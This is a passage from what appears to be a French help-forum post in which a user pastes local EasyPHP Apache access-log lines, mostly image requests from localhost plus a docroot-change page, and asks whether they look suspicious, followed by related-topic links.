/home/images_easyphp/bar_info_bg.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/usb_key.png HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/chiffre_7.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_h.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/chiffre_5.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/mysql.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_m.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_p.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_y.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_i.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_d.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/bar_550.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/php.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_n.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/chiffre_0.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/phpmyadmin_usredit.png HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_H.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_P.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_N.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_F.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_O.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/timezone_logo.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/refresh.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/submit_select.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_E.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_X.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_T.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/chiffre_8.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_q.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/sqlite.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_s.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_r.gif HTTP/1.1" 304 - 127.0.0.1 - - [21/Jun/2011:14:30:11 +0200] "GET /home/images_easyphp/lettre_t.gif HTTP/1.1" 304 - // Fin de : Ceci me parait louche. Est-ce normal ? 127.0.0.1 - - [21/Jun/2011:14:30:37 +0200] "GET /home/index.php?to=change_docroot HTTP/1.1" 200 7027 127.0.0.1 - - [21/Jun/2011:14:30:42 +0200] "POST /home/index.php HTTP/1.1" 302 -
A voir également:
- Mon serveur web, est-il réellement hacké ?
- Web office - Guide
- Changer serveur dns - Guide
- Création site web - Guide
- C'est quoi une adresse web - Guide
- K9 web protection - Télécharger - Contrôle parental
